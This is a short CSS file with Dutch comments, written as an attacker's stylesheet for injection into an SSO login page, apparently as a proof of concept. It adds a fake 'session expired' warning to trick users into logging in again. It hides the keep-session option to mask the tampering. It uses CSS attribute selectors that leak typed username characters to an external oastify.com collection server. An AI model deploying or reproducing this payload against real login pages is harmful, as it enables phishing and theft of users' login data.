/* evil.css - Hosted op attacker.com */
/* Dit wordt geladen in de SSO loginpagina */

/* 1. Verberg originele branding, toon nep-branding */
/*.TitleBar {*/
/*  background-image: url('https://attacker.com/fake-logo.gif') !important;*/
/*}*/
/*.TitleImage {*/
/*  background-image: url('https://attacker.com/fake-brand.gif') !important;*/
/*}*/

/* 2. Voeg nep-bericht toe boven het loginformulier */
.panel-heading::before {
  content: "Uw sessie is verlopen. Log opnieuw in.";
  display: block;
  color: #cc0000;
  font-weight: bold;
  padding: 8px;
  background: #fff3cd;
  border: 1px solid #ffc107;
  margin-bottom: 10px;
  border-radius: 4px;
}

/* 3. Data-exfiltratie via CSS-attribuut-selectors */
/* Elke letter getypt in username triggert een request */
/* naar attacker's server (werkt op browsers die */
/* input[value] live updaten in de DOM) */
input#LogOnName[value^="a"] { background: url('https://7u2cws3k3lnvhyz2gxgsabxquh08ozco.oastify.com/exfil?u=a'); }
input#LogOnName[value^="b"] { background: url('https://7u2cws3k3lnvhyz2gxgsabxquh08ozco.oastify.com/exfil?u=b'); }
input#LogOnName[value^="c"] { background: url('https://7u2cws3k3lnvhyz2gxgsabxquh08ozco.oastify.com/exfil?u=c'); }
/* ... etc voor elk karakter ... */

/* 4. Verberg "Unlimited logon time" om verdacht gedrag te maskeren */
#KeepSession, label[for="KeepSession"] {
  display: none !important;
}

/* 5. Styling aanpassen zodat het er legitiem uitziet */
body {
  font-family: 'Segoe UI', Arial, sans-serif !important;
}
